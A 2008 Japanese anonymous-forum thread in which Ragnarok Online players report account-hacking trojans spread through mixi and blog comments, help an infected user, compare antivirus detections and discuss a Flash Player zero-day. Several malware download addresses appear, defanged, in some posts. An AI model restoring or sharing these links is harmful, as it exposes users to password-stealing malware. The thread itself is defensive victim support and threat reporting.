即効スキャン削除の上PASSは変えたが・・・ｵｿｶｯﾀ

660 ：（○口○*）さん sage ： 2008/05/22(木) 08:23 ID:038gaTsm0

>>655
ずいぶん前から言われているねぇ。WoWでは日常茶飯事だし、
換金できるSecondLifeがさらに後押ししちゃった感がある。

661 ：（○口○*）さん sage ： 2008/05/22(木) 17:09 ID:wVa/NHvX0

>>644
プロアクティブディフェンスONにするとPT窓開くと致命的に遅くなるんだよね。
PT窓から支援かけてるんでかなり致命的に…

662 ：（○口○*）さん sage ： 2008/05/22(木) 18:56 ID:CVdU7ees0

知人のブログに書き込まれていたコメント。多分アカハックだと思われます。

【ＲＯ】ＳノビでＡｓｐｄ１９０（修正）
動画テストその２、前回画質がかなり悪かったので修正、前よりはましになっていると思います（笑）、
動画は同じ物を一部カット装備説明追加、Ａ＝ＤのＳノビが崑崙闘技場でＡｓｐｄ１９０出して見ました、
あと、おまけで課金なしでちょっと狩ってます。
ttp://www■gameicity■com/flash/rmovo.zip

既出かな？

663 ：（○口○*）さん sage ： 2008/05/22(木) 19:01 ID:8ynK7GDi0

【　 　 　 気付いた日時　 　 　 　 　 】5/22 23時頃
【不審なアドレスのクリックの有無　】有　
【　　アドレス 　 】www■sakerver■com/web/douga/stream/keitaidouga51200079■zip
【　 　　 OS　 　 】WindowsXP Professional SP2
【使用ブラウザ 】IE6.0
【WindowsUpdateの有無】自動
【　アンチウイルスソフト 】NortonInternetSecurity2007
【その他のSecurty対策 】無
【 ウイルススキャン結果】カスペルスキー、ノートンで検出結果なし
【テンプレの参考サイトを読んだか】Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
mixiのコメント欄に載っていたURLを何かの動画サイトかと思い
迂闊にもそのままアドレスバーでURLを削って入れてしまいました,,,。
真っ赤なだけの画面が出たので慌てて閉じ
ノートンでスキャンしましたが何も出ず、
カスペルスキーでもスキャンしましたが同様に何も出ませんでした。
その後ネットの接続を切り、今日ネットカフェへ行って
カスペルスキーでスキャンした後　パスワードなどを変更してきました。

それでもまだ心配なのでシステムリカバリーをしようと思いバックアップ作業をしていた所
窓がブラクラの様に何重にも開く現象が度々起こるようになりました。
(その場合は強制終了させてます)
必要なファイルはYahooのブリーフケースに置いてこようと思っていたのですが
IDとパスワードを入れるのが怖くて出来ません。
CDに収めるのもウイルスか何かを一緒に持ってきちゃいそうで,,。
これはそのままバックアップ準備を進めても問題ないでしょうか？
それともバックアップはとらずにリカバリしてしまう方が安全でしょうか？
自分の認識の甘さと安易な行動で起こした事なのに、申し訳ありません。

664 ：（○口○*）さん sage ： 2008/05/22(木) 19:05 ID:6qdg+qJG0

ネカフェで変更したことの方が怖いんだが…
何の窓が開いてるのかもわからない、IEが自動で出てきてるんだろうか

665 ：（○口○*）さん sage ： 2008/05/22(木) 19:37 ID:8ynK7GDi0

>>664
他に環境が無く…すみません
検索しようとIEを起動する時、フォルダに有る画像のプレビューを見る時
それとメモ帳を開いた場合もなるようです。
電源落とすと直りますが、しばらく作業をしていると突然増えます。

666 ：（○口○*）さん sage ： 2008/05/22(木) 19:51 ID:Mq4zWD7o0

VMware、リモートデスクトップ、ソフトウェアキーボードを利用して、
今より少しでもセキュアな方法はないだろうか。
特に、パスワードを変えるとか、そっち系で。

667 ：（○口○*）さん sage ： 2008/05/22(木) 19:54 ID:h/wjStUj0

IEのインターネットオプションの各設定と、スタートアップの確認
IEではJavaScriptとJavaを当面禁止に
FirefoxやOperaなどの非IEブラウザの導入
Spybotなどのスパイウェア駆除ツールの導入とスキャン
まずはこれだけしてみれば？

668 ：（○口○*）さん sage ： 2008/05/22(木) 20:39 ID:WvFyWO9+0

RO以外のことを全てLinuxでやる、とか。

669 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/22(木) 20:45 ID:E4oddN+00

>>662
情報ありがとうございます。新規でした。
なんだかあちらこちらで爆撃されているようですね‥。
さっそくリストに追加しました。


>>665
あまり意味無いかもしれませんが、
画像に関してはプレビュー機能を切ってしまうという手は？

フォルダウィンドウのツールで設定
　ツール→フォルダオプション→従来のWindowsフォルダを使う

USBメモリやCD-Rにバックアップできる環境があるなら
そのまま放りこんでもある程度なら大丈夫かと思われます。
戻す作業の時にCD自体にウイルススキャンをかければよろしいかと。

残しておきたいデータ類の場所がある程度特定さえできていていれば
問題は起きにくいでしょうし個人で管理しているフォルダ名の所に
ウイルスが紛れる事は少ないかなあ…とか。
.jpgや.pdfに偽装されていなければ
注意すればよいのはexe、com、dllとか、
LZH、Zipなどの圧縮ファイルなので大まかでも選別がしやすいはずです。

DOS環境で作業が出来るのであれば
起動時F8でセーフモードのコマンドライン作業をするという荒業も。
(FDやFILMNTなどファイル管理ツールが無いと厳しいですが)

ROのパスワードは携帯電話等の端末環境をお持ちなら
携帯で変更できるかわかりませんが多分できるはず…？

・ガンホーゲームズのサポートセンタートップ
https://secure.gungho.jp/index.aspx

670 ：（○口○*）さん sage ： 2008/05/22(木) 21:30 ID:2HjvJfxu0

スレの２か３か辺りで出てた話だが、手軽にクリーンな環境を用意する方法は
次の２つかな

A)1CD Linixを使う
B)VMWare＋Lunixを使う

1CD Linuxなら完全に安全な環境が作れる。
(イメージそのものに感染してたら別だけど)
再起動すれば、またクリーンな環境になるので、多少の無茶も可能

欠点は、事前の準備が必要な事。
ログイン合戦の時に悠長にDL＋焼きつけ＋再起動なんて真似は出来ない。


仮想PCはVMWarePlayer＋Ubuntuが共に公式配布の形で無償提供されてる。
Windows上から操作するので、ログイン合戦時は1CD Linuxより融通が利く。
また仮想PCに何か感染しても、イメージ削除でクリアされる。
(1CD Linux時の再起動と一緒)

欠点は、キーロガー系・パケットキャプチャー系の罠に感染してた時に
100%の信頼が得られない事。

過去スレでも検証されてたが「100%・絶対」安全と断言は出来なかった。　　
皆に仮想PC経由で情報が抜かれる可能性は０に近いと思ってたが、可能性だけで
論じるなら危険性は０ではない。

ケースバイケースだが、利便性と合わせて考えると、検体チェックや危険アドレスの
調査、普段からの利用には仮想PCが、クリーンな環境からのパス変更には1CD Linuxが
向いてる。

あと個人的な意見だが、リモートデスクトップやソフトウェアキーボードは
セキュアとは言い難いと思う。


ちなみに自分は検体入手・調査にはVMWare＋Ubuntu(火狐とwget)を使ってる。
昔と違って仮想PCは敷居がかなり低くなってるので、結構お勧め。
無償で出来るし、遊びで使う分でも楽しめる。

671 ：（○口○*）さん sage ： 2008/05/22(木) 22:35 ID:pLfLdShH0

>663
Spybotとかの、スパイウェア用ツールを試すべし
ハクのトロイが子供騙しとしか思えないぐらい、システムに食い込む奴も多い

正直、カスペとかだけに頼るのは片手落ち
万能の不正対策ソフトがない以上、ハク対策だけじゃなく、一般的な
マルウェア対策も同時に行った方がいいよ

672 ：（○口○*）さん sage ： 2008/05/22(木) 23:15 ID:Mq4zWD7o0

>>670
リモートデスクトップパケットは、
CKPTプロトコル（RDPだと思ってたんだけど）という
謎なものが流通するみたいだね。

自分の家がセキュアなら、どこにアクセスしたかわからないから、
ネカフェのPCで直接変えるよりマシかな程度。
（アカウントを有名ネトゲ公式でログインされる可能性はあるが）

ソフトウェアキーボードも、普通に打つよりマシじゃね？程度で。

673 ：（○口○*）さん sage ： 2008/05/23(金) 00:17 ID:nuwC2zz40

>>663です
レス有難う御座います。
色々検索が枝分かれして混乱気味ですが
とりあえずSpybotは優先して落としてみました。
ウイルスなどはみつからなかったのですが、
”ファイルまたはディレクトリ C:￥$Mft が壊れ 〜 CHKDSKを実行してください”と出ました。
CHKDSKを実行後、spybotが反応し必要なレジストリの変更にBootExecuteを指定。
ですが何度変更を許可しても、CHKDSKをするとまた同じ反応をします。
更に検索を続けるとシステムの復元を勧める記事も多かったので試したのですが失敗でした。
(シマンテックがどうのこうの…すみません、メモし忘れました…)
これ以上進むとスレ違いになるので控えますorz
とりあえずファイルはCDに移し、リカバリ後問題があるようなら修理に出すことにします。
ちなみに携帯は二年程前から使用しているAUなのですが、
EzwebとOpera共にエラー等でログイン失敗でした。

VMwareはまだじっくり調べてはいないのですが
>>670さんを参考に勉強して、良さそうならこの方法で対策を練ります。
同時にセキュリティはもっと基礎から学んでいこうと思います･･･。
お騒がせして申し訳ありませんでした。
そして皆様、ご助言本当に有難う御座いました。

674 ：（○口○*）さん sage ： 2008/05/23(金) 00:28 ID:+e3Sqzeg0

>>673
ブートセクター（PC起動時に最初に読み込まれる箇所）が、壊れたか書き換えられたかの可能性あるから
HDDのフォーマットをしてからリカバリするといい。

675 ：（○口○*）さん sage ： 2008/05/23(金) 00:38 ID:R7lWvBHp0

>673
まず www■sakerver■comだが、ここは危険ドメイン扱いになってる。
自分のhostsを確認(hostsRenewScriptで自動更新してるもので。)したら
127.0.0.1と登録済みだった

んで、件のファイルを拾ってきたところ、VirusTotalで5/32という惨状
ttp://www.virustotal.com/analisis/a304aa18f393acb425d463ae93a53c45

>AVG　PSW.Ldpinch.11.BQ
>DrWeb　Trojan.PWS.Reggin.52
>eSafe　Suspicious File
>F-Secure　Trojan.Win32.Inject.ceo
>Microsoft　PWS:Win32/Magania.gen

カスペ・NOD32・Avast等全滅。
例によってAVGやMicrosoftが検出。
傾向からして、ハク系かな？

駆除するならAVGかMicrosoftだろうけど
>”ファイルまたはディレクトリ C:￥$Mft が壊れ 〜 CHKDSKを実行してください”と出ました。

トロイが悪さしたかどうかは何とも言えないが、HDDがヤバい事になってるね
「CHKDSK /R」で修復出来る(かもしれない)けど、読めるうちにバックアップを急いで行った方が良い。
放置してるとそのうちWindowsが起動しなくなる。


取りあえず、カスペとNOD32に検体提出してきまする。

676 ：（○口○*）さん sage ： 2008/05/23(金) 02:19 ID:ISBmprmn0

VMWareの無料のやつって、DirectX使った描画ができないんじゃなかった？
有料のやつの体験版使えばイメージ作れそうな気がするけど、
仮想PCでWindows＋nProを動かすとなると、結構なスペックのパソコンが必要になるね

677 ：675 sage ： 2008/05/23(金) 02:58 ID:R7lWvBHp0

カスペより返答有り

keitaidouga51200079■zip　(※実際はrarファイルで拡張子がzipなだけ)
-> ro%C6%B0%B2%E8■exe　（Trojan.Win32.Inject.ceo）


>676
安全な環境構築に仮想PCを使うという話で、VMWare上でROや他ネトゲを
動かすという話じゃないと思うけど。

678 ：（○口○*）さん sage ： 2008/05/23(金) 06:18 ID:uqJT7duS0

>>677
その検出名はF-Secure(のKasperskyエンジン)と同じなので
VTが調子悪かったんだと思う。手元では昨夜の時点で検知した。

679 ：（○口○*）さん sage ： 2008/05/23(金) 12:25 ID:CiMYc/7Q0

どちらかといえば、VTがパターンファイルを取得したタイミングだろうな。

しかしInject系に限って言えば、MSは強いなぁ。
OneCare試してみたくなってきた。
カスペも数時間の差で対応してるから良いといえば良いんだが。

あと地味にDrWebも強い。
こっちはファイルの調査用の投稿フォームがあるから、怪しいファイルが
ある場合、投げてみるのもいいかも。

680 ：（○口○*）さん sage ： 2008/05/23(金) 12:32 ID:uqJT7duS0

Dr.WEBのフォームが最近調子悪い

681 ：（○口○*）さん sage ： 2008/05/23(金) 15:44 ID:GLryCDTS0

今日のパッチ後にavastが
〜RagnarokOnline\GameGuard\dump_wmimmc.sys
隠しファイル
を疑わしいマルウェアとして報告してきたんだけど無視しといていいのかな？

682 ：（○口○*）さん sage ： 2008/05/23(金) 15:45 ID:WGOopeAk0

ちょいと質問です。
ここ数日、mixiにROの内容を書いていたら
｢カプラの猫耳試してみました〜｣だの｢アサクロ何とか動画〜｣という
タイトル？とzipのアドレスのみ(コメ無)を載せてくる人が2人居たんですが、
片方はROのコミュとか入ったり日記で｢自分のアカウントを利用して
ROの単語が入ってる日記に無差別にコメントを書き込んでいる〜｣と
現状を書き込んでいる人、
もう片方はコミュにも自己紹介にもROのかけらも感じない一般人のような
人(しかも現状に気づいてないらしい)だったんですが、
前者はともかく後者がどうして発信元になっているのか判らなくて…

最近の垢ハックウィルスには感染者のmixi垢情報の搾取と
無差別コメント書き込み機能なんかも付いてるんでしょうか？
それとも情報を得た業者が自分で…？

683 ：（○口○*）さん sage ： 2008/05/23(金) 17:23 ID:onrfI3rx0

>>681
それはただのnProのファイルだから気にしなくてok

684 ：（○口○*）さん sage ： 2008/05/23(金) 17:24 ID:+e3Sqzeg0

>>681
それ、nProのファイルだから許可しないとRO起動しなくなるぞ。

>>682
mixiの垢をハックして、別人がなりすまして、アカハックのアドレスを貼り付けてまわるといった事例が
よく見られます。

運営に通報すると共に、なりすまされた人にも連絡し、セキュリティソフト入れてパス替えるように勧めると親切です。
（勿論、業者が自分でmixiの垢をとっている場合も無いとは言い切れませんが）

685 ：（○口○*）さん sage ： 2008/05/23(金) 17:58 ID:WGOopeAk0

>>684
返答有難う御座います！
一応後者の一般人と思しき方にはメッセージは入れたのですが、
こちらからも運営に通報しておきますね。
結局は別人がなりすましてやってるという認識で大丈夫ですよね…？
それにしてもROと関係無い(かもしれない)人のmixi垢まで使うとは…

686 ：（○口○*）さん sage ： 2008/05/23(金) 18:11 ID:GLryCDTS0

>>683-684
ありがとう

687 ：（○口○*）さん sage ： 2008/05/23(金) 19:06 ID:uqJT7duS0

>>685
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/632
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/671
などのようにネトゲトロイ+mixi複合アカハックがある

688 ：（○口○*）さん sage ： 2008/05/23(金) 21:43 ID:JcC+RnTB0

WinXPでOnline Armor Personal Firewall Freeを使ってみているのですがGameGuardに引っかかりPCが落ちるのですが
使えるようになる設定等ありますでしょうか？

689 ：（○口○*）さん sage ： 2008/05/25(日) 02:11 ID:SWZVGT1b0

avastはROと相性が悪いと聞いたのですが、どうなのでしょう？
変にひっかかる時があり、ずっと回線の問題だと思っていましたが、回線が悪くない時でも起きているみたいです

690 ：（○口○*）さん sage ： 2008/05/25(日) 03:01 ID:ilFObR5z0

>>689
ファイルが書き込まれた時のスキャン、定義更新時に、AvastはCPUをかなり占有するらしい。
その結果、ROやnProの動作を遅延させてしまい、カクカク描画や、一定時間止まって一気に動きだす等の
不具合に繋がる模様。この症状は、セキュリティソフトを入れ替える事で改善されたという報告が上がっている。

最近のv4.8以降でもavastで改善されたという報告は上がっていないので、現時点でも、同じ状況なのだろう。

691 ：（○口○*）さん sage ： 2008/05/25(日) 03:09 ID:SWZVGT1b0

>一定時間止まって一気に動きだす等
まさにこれですorz
酷いときは1分以上自キャラだけ動けずリログや終了も出来ず死ぬのを眺める羽目になることも…
自動更新は切ってるんですけど、常駐保護だけでも起きるんですね

AVGを入れてみようと思いますが、試用版を30日間以上連続使用するためにはどうすればいいでしょう
avastだと期限切れるたびにアドレス登録してライセンスキーを取得することでまた使えるようになるのですが
AVGだとインストールしなおさなきゃだめでしょうか？

692 ：（○口○*）さん sage ： 2008/05/25(日) 03:17 ID:SbReCo1e0

フリー版でよけりゃ日本語版の配信がちょうど開始したとこ。
一応アド張っておくわ。
ttp://www.avgjapan.com/avgfree80-dl.html

試用版に関してはﾜｶﾝﾈ。

693 ：（○口○*）さん sage ： 2008/05/25(日) 03:19 ID:wtM9uVSB0

そもそも試用版を試用期間以上に使おう、という考え方がアレなんだぜ

694 ：（○口○*）さん sage ： 2008/05/25(日) 09:14 ID:pyJ8ukYp0

＞avastだと期限切れるたびに
あれは試用版じゃない。

695 ：（○口○*）さん sage ： 2008/05/25(日) 11:36 ID:Upww7oGn0

そいつはしようがないな

696 ：L ★ sage ： 2008/05/26(月) 21:00 ID:???0

www.virustotal.comがNGワードに引っかかっていたようなので、戻しておきました。

697 ：（○口○*）さん sage ： 2008/05/26(月) 22:29 ID:cPCoeLoP0

>>696
ありがとうございました。

698 ：（○口○*）さん sage ： 2008/05/27(火) 02:40 ID:i53Q2+d/0

深淵の騎士子たんに萌えるスレ８ に投稿されていたもの。
404エラーで検体入手には失敗
削除依頼スレで、ループタグ発見 と出ていたので、偽装jpegだったのかも。

ttp://be-sp■com/deux/ura/src/1211557950655■jpg

699 ：（○口○*）さん sage ： 2008/05/27(火) 17:17 ID:6ypcS5tG0

スレ違いならごめん。

VISTA使用なんだけど、デーモンツールをインストールしようと思ったんだ。
でも、VISTAに対応してる最新版にはアドウェアが入っているとか聞いたんだ…
VISTAでデーモン入れてるけどRO（垢ハックとか）問題ないぜ、って同志はいるかな……？

700 ：（○口○*）さん sage ： 2008/05/27(火) 17:35 ID:H79uS5Oh0

一緒くたにすなや…

701 ：（○口○*）さん sage ： 2008/05/27(火) 18:01 ID:ZGA6k9Rt0

>699
XPだが、最新版のデーモンツール入れてるけど何とも無いぜ。

それにデーモンはインストール時に外す事が出来るし。
それでも裏で入ってるんじゃないかと疑うなら、デーモンは諦めて他のを
使ったほうがいいかも。


というかアドウェアとマルウェアは基本的に別物。
中には度が過ぎてマルウェアやトロイと呼べるものもあるにはあるが
基本は別物。

702 ：（○口○*）さん sage ： 2008/05/27(火) 18:44 ID:i53Q2+d/0

アルコール52%にしとけよ

703 ：（○口○*）さん sage ： 2008/05/27(火) 21:56 ID:EXK7dC3m0

>>699
スレ違いっていうか、ググれば、「デーモンの中に入っているアドウェアは有害なのか？」みたいな記事がヒットすると思う。
昔調べた記憶があるので。

704 ：（○口○*）さん sage ： 2008/05/28(水) 12:29 ID:FYsJth3H0

中華アカウントハッカーのいくつものサーバがswfを吐くようになったのが一昨日くらい。
もしやと思いつつVirusTotal等で完全スルーされたので明言は避けてきたけど、
やっぱりFlashPlayerの脆弱性を使い出した模様。

McAfeeブログ
ttp://www.avertlabs.com/research/blog/index.php/2008/05/27/newsflash-flash-player-blight/
ttp://www.avertlabs.com/research/blog/index.php/2008/05/27/flash-player-exploit-update/

9.0.115までやられるので早急に9.0.124にアップデートしましょう。
YouTubeとかニコニコ動画とかもFlashだからね!

705 ：（○口○*）さん sage ： 2008/05/28(水) 12:31 ID:FYsJth3H0

追記。FlashPlayerなのでブラウザに依存しません。

706 ：（○口○*）さん sage ： 2008/05/28(水) 12:47 ID:FYsJth3H0

play0nlnieによる実用例
SANS ISC日記
ttp://isc.sans.org/diary.html?storyid=4468

707 ：（○口○*）さん sage ： 2008/05/28(水) 12:57 ID:APNFc6Ic0

ブラウザプラグインの為、非Trident系ブラウザ(FireFoxやOperaなど)のユーザーの場合、それらとIEの両方のプラグインを更新すること。
オンラインゲームのパッチクライアントなど、IEコンポーネント部分を使用する事も多いので。

それと併せて、FireFox+NoScriptのような、必要ないサイトでのスクリプト遮断もお薦め。
0dayのような状況でも、被害を未然に食い止められる可能性が出てくるから。

708 ：（○口○*）さん sage ： 2008/05/28(水) 13:03 ID:DdNstTAM0

最新バージョン9.0.124にも脆弱性が見つかりました
皆様お気を付け下さいませ

Flash Playerにゼロデイの脆弱性、大規模被害の恐れも
ttp://www.itmedia.co.jp/enterprise/articles/0805/28/news018.html

709 ：（○口○*）さん sage ： 2008/05/28(水) 13:08 ID:nUXh2Onw0

ttp://www.itmedia.co.jp/enterprise/articles/0805/28/news018.html
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080528/304425/

>脆弱性が報告されたのはFlash Playerの現行バージョン9.0.124.0
>およびそれ以前のバージョン。Adobeはまだパッチを公開していない。
>米Symantecはこの脆弱性を突いたエクスプロイトが広く出回っているとして、
>グローバルセキュリティ警告システム「ThreatCon」の警戒レベルを引き上げた。

リネージュ資料室でもトップで警告を発してる。
ブラウザ関係ないので、IE使ってないから安全、という考えは通じない。

710 ：（○口○*）さん sage ： 2008/05/28(水) 13:26 ID:FYsJth3H0

検体発射済み。
スクリプトを見るとブラウザによってswfを変えるもの、
FlashPlayerのバージョンによってswfを変えるものなど
いろんなのがある。

711 ：（○口○*）さん sage ： 2008/05/28(水) 13:37 ID:FYsJth3H0

バージョン判定で9.0.115までの奴しか見かけないから勘違いしたけど
9.0.124でもだめくさいね。

712 ：（○口○*）さん sage ： 2008/05/28(水) 15:30 ID:nUXh2Onw0

>710
具体的にどういう手法をやらかしてるんだろう？
罠swfを読み込むようにJavaScriptを記述したhtmlを用意して
それをサイズ０のiframeで読み込ませるとか？

FireFox+NoScriptで安全と判断したサイトのみスクリプトを
動かすように設定してても、そこがSQLインジェクションとかで
攻撃されてたら引っかかる気がするし。

Adobeが対応バージョンをリリースするまでは、FlashPlayerを
アンインストールするのが一番確実かなぁ。
ニコやYouTubeとかの動画サイトの閲覧も出来なくなるし、不便な事
この上ないが……

>米メディアの報道（CNET News.com）によると，ある条件のもとでは、
>ユーザーはマルウエアをホスティングしている中国のサーバーに
>リダイレクトされる。

このうち何割かがネトゲの垢ハクの罠の可能性も十分あるよねぇ……

713 ：（○口○*）さん sage ： 2008/05/28(水) 16:00 ID:FYsJth3H0

>>712
設置するサイトはインジェクションしたり
BBSやwikiやblogへ投下などいつものやつ。
既に既存のアハカックサイトのFlash対応も始まっている。

scriptを使うのはブラウザやFlashPlayerのバージョン判定をするもの。
scriptを使わず普通にHTMLでFlashを読ませるサイトもあるので
script止めただけじゃだめっぽ。objectタグやembedタグを無効にするか
Flashそのもの(AciveXコントロールやプラグイン)を無効にするしかない。

半分以上はネトゲアカハックと思われる。

714 ：（○口○*）さん sage ： 2008/05/28(水) 16:02 ID:FYsJth3H0

で、怪しいURIは踏まない! と言っても
企業のサイトがインジェクションで食われる昨今、
ソニーとかみたいなFlashまみれのサイトはちょっと踏みたくないな。

715 ：（○口○*）さん sage ： 2008/05/28(水) 16:10 ID:APNFc6Ic0

>>712-714
とりあえず、Firefox+NoScriptなら、Flash(やSilverLight)の禁止設定も可能ではある。

ttp://distraid.co.jp/demo/tips_noscript.html
> NoScriptの主な機能としては下記のようなものがあります。
> * JavaScriptやiframe、Flash/SilverLight/Javaなどの有効/無効設定
> * Whitelist(許可サイトリスト)システムにより、上記の機能の可否をサイト毎に設定可能
> * CrossSiteScripting(XSS)対策

WinXP(SP1以降だっけ?)のように、OS標準でFlash Playerプラグインが導入されている例もあるし、ゲームのパッチクライアント自体が
Flashを使用しているようなケースもあったはず。

それとは別に、Flashがインストールされていないとリンク先に飛べないページがあるようなサイトは、アクセシビリティの面から好ましくはないが。

716 ：（○口○*）さん sage ： 2008/05/28(水) 16:13 ID:APNFc6Ic0

もう一点。
比較的解りやすいNoScript導入ガイド。
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080421/299675/

717 ：（○口○*）さん sage ： 2008/05/28(水) 16:38 ID:nUXh2Onw0

>713
情報サンクス。

>設置するサイトはインジェクションしたり
>BBSやwikiやblogへ投下などいつものやつ。
エンドユーザー側(と言っていいのか)へは手馴れた普段の手法で行える、と。

>script止めただけじゃだめっぽ。objectタグやembedタグを無効にするか
>Flashそのもの(AciveXコントロールやプラグイン)を無効にするしかない。
こちらも予想通りというか何というか……

>715
全面的に禁止するなら、Flashのプラグインをアンインストールするのと
一緒の事。
信頼して良いサイトをホワイトリストに登録して許可したとしても、そこが
インジェクション攻撃で汚染された場合、被害に合う。

結局、対応版がリリースされるまでは、アンインストール(或いは全面的に
OFF)する以外に安心出来る手段がないという事に、と思ったんだが……

718 ：（○口○*）さん sage ： 2008/05/28(水) 16:50 ID:FYsJth3H0

補足。
>エンドユーザー側(と言っていいのか)へは手馴れた普段の手法で行える、と。
FC2ブログハックなどで広まったRealPlayerの脆弱性を使う罠は
スクリプトのみでexeを動かすことができ、rm(RealMedia)などは不要だった。
今回は逆で、スクリプトは不要なかわりに
exeを動かすためのswf(Flash)を作成する必要がある。
もう罠swf生成ツールが出回ってるのかもねぇ。

しかし今回のはやばいな。
FlashPlayerの普及率、RealPlayerの比じゃないよね。

719 ：（○口○*）さん sage ： 2008/05/28(水) 18:49 ID:nUXh2Onw0

ttp://japan.cnet.com/news/sec/story/0,2000056024,20374112,00.htm

Symantecが確認したリダイレクト先は dota11■cn だそうな。
最近良く見ると思ったら、Flash絡みだったのね……

ちなみにそこは、まとめ臨時さんやリネ資料室等のhostsには掲載済みの
既知の危険アドレス。

当然他にもリダイレクト先はあるだろうけど、最初にヒットしたのが垢ハック系
だったってのは、なんていうか、複雑。

720 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/28(水) 18:56 ID:8TI8izJo0

どうでもいい憶測ですが…
最近はニコニコ動画を観る為にFlashPlayerは必ず導入するので
セキュリティ対策もしていない一般層が
どこかで感染して被害と言うケースが物凄く増えそうです…。

とりあえず当方はFlashPlayerをアンインストールしました。
Flashがなくても人間生きていける。

>Flashがインストールされていないとリンク先に飛べないページがあるようなサイトは、アクセシビリティの面から好ましくはないが。
715さんの言われるように
最近はFlashを観ないとサイト自体が機能しない所が増えた気がします。
映画とかゲームメーカーとか飲料メーカーとか…。
skipボタンすらないところもあるのでなんともな感じです。
一方で家電メーカーはhtml版とかあるのは気配りだと思いたいところ。


物が物だけにリストを急遽更新しました。
名前を厳密に設定しないといけないと電波を受けたので
今回、ドメイン名をワード検索でかけて
厳密な名前が出てきた分をUPしてみました。
おかしい所があれば突っ込みお願いします。

721 ：（○口○*）さん sage ： 2008/05/28(水) 18:56 ID:DdNstTAM0

垢ハックといっても対象がネトゲに限らんからなぁ

722 ：（○口○*）さん sage ： 2008/05/28(水) 19:01 ID:MUdZLfkZ0

そういや垢ハックって「フィッシング」に分類される犯罪なのだろうか

723 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/28(水) 19:02 ID:8TI8izJo0

ああ…憶測を書いていることがどうでもいい事で
セキュリティ対策をしていない一般層に対してどうでもいいって事ではないです。

明日はわが身かもしれないと思うと気が気でなくなります。

724 ：（○口○*）さん sage ： 2008/05/28(水) 19:13 ID:Edi/4Iln0

swfに埋め込むって事は、極論すれば普通のswfファイルに
罠を埋め込んで、正常に再生させつつも罠を発動させる事が
可能って事？
一昔前のインプラントJPEGみたいに。

もし可能なら、ニコ動とかで再エンコ無しでうｐれば、被害が
一瞬にして万単位とかになる気がしたんだが、どうなんだろうか？

725 ：（○口○*）さん sage ： 2008/05/28(水) 19:18 ID:FYsJth3H0

>>724
可能だろうね。
アップされる鯖側でスキャンするデーモン作るよりは
Adobeの対応のほうが早そうだなぁ。

726 ：（○口○*）さん sage ： 2008/05/28(水) 19:39 ID:OEH89Bar0

>>724を見て慌ててニコ動をWhitelistから削除した(((;ﾟдﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

727 ：（○口○*）さん sage ： 2008/05/28(水) 19:57 ID:ZczJkkTg0

アイマス動画に仕込んでニコ厨憤死とかありえそうだな

728 ：（○口○*）さん sage ： 2008/05/28(水) 20:03 ID:APNFc6Ic0

>>717
今回のようなケースでは、FlashPlayerのアンインストールでも事足りるけど、平時でも、広告枠のような無用なswfを
抑制する事で、トラフィックやCPU負荷を削減し、快適なブラウジングへのメリットもある。

単に脆弱性避けであれば、非Windows環境でのブラウジングを行えば、大方の罠には掛からないというのもまた事実ではあるが。

>>718
WinXP以降ににバンドル(どうやら初期出荷版からだった模様)されている事からも、PCユーザーの大多数が危険に曝される可能性がある。
ある程度終息するには、WUでのアップデート配布が行われる必要もあるだろう。
Windows自体やIEもそうだけど、ある企業の製品が市場で寡占状態になると、どうしても弊害が出てくる。
Flashは、とうにRealMediaを追い抜いているだろうし、SilverLightに至っては、M$とGoogle関係の一部でしか見掛けたことがない。

>>720
go.jpですら、flvを使用している時代なので。
健常者であるうちはともかく、スクリーンリーダーなどを使用した環境では、今のwebはバリアだらけだという現実があったり。
swfにきっちり代替テキストを埋めこんでいるweb制作者は、まだまだ多いと言えないのが辛いところ。

729 ：（○口○*）さん sage ： 2008/05/28(水) 20:55 ID:B+dYf+2K0

何かWUが来ました。（詳細は不明）

730 ：（○口○*）さん sage ： 2008/05/28(水) 21:16 ID:B+dYf+2K0

再起動してWUの履歴を確認してみると、

Windows XP 用の更新プログラム (KB932823)
IME が有効になっている Windows XP を実行中のコンピュータに、
Windows Internet Explorer 7 を使用してファイルをダウンロードできない
という問題が修正されます。

だそうで、>>728とは別件のようです。誤報失礼しましたorz
>>728の件なら対応早いなとちょっとドキドキしたのですが・・・

731 ：（○口○*）さん sage ： 2008/05/28(水) 21:31 ID:DdNstTAM0

WUってWindowsUpdateですか…。
Flash Palyerは自分で更新しに行かないとダメです。
まだ出てませんがね。

732 ：（○口○*）さん sage ： 2008/05/28(水) 21:40 ID:RpkTpr+70

どうやってリダイレクトを仕込ませてるのかが良く分からんね
それさえ分かれば、ニコニコに関しては、うｐ時にファイルをチェックする機構を盛り込むようにすることで対処できると思うんだ
とりあえず、「この件に関する対応するまでニコニコ動画を利用しません」という旨の問い合わせを送っておくつもりでいる

733 ：730 sage ： 2008/05/28(水) 21:45 ID:B+dYf+2K0

>>731
いや、それくらいは知っているのですが、
>>728の中段あたりに書いてあることと、WU更新がすごいタイミングで
来たもので・・・ね orz

734 ：（○口○*）さん sage ： 2008/05/28(水) 21:48 ID:FYsJth3H0

>>732
swfにhttpどうたらこうたらexeが書いてある
(で、たぶんそれが問答無用で実行される)。
もっともswfから別のswfを呼び出したり
swf自体を圧縮してあったりするので
ぱっと見ではわからない。

735 ：（○口○*）さん sage ： 2008/05/28(水) 21:50 ID:DdNstTAM0

>>733
わかりにくい略はやめてねって気持ちだったんだけれど。

736 ：730 sage ： 2008/05/28(水) 23:11 ID:B+dYf+2K0

>>735
なるほど、失礼しました＾＾；

737 ：（○口○*）さん sage ： 2008/05/28(水) 23:19 ID:SOpzGVdh0

このスレでwindows updateと書かれてるのは13件、WUと書かれてるのは7件あったんだが。

738 ：（○口○*）さん sage ： 2008/05/28(水) 23:21 ID:DdNstTAM0

そうですか。

739 ：（○口○*）さん sage ： 2008/05/28(水) 23:22 ID:XNzANFoC0

自分が認めない物は全て否定だから

740 ：（○口○*）さん sage ： 2008/05/28(水) 23:59 ID:RpkTpr+70

>>734
サンクス
単純にはいかないみたいだね
本家の更新を待つ他無いか・・・

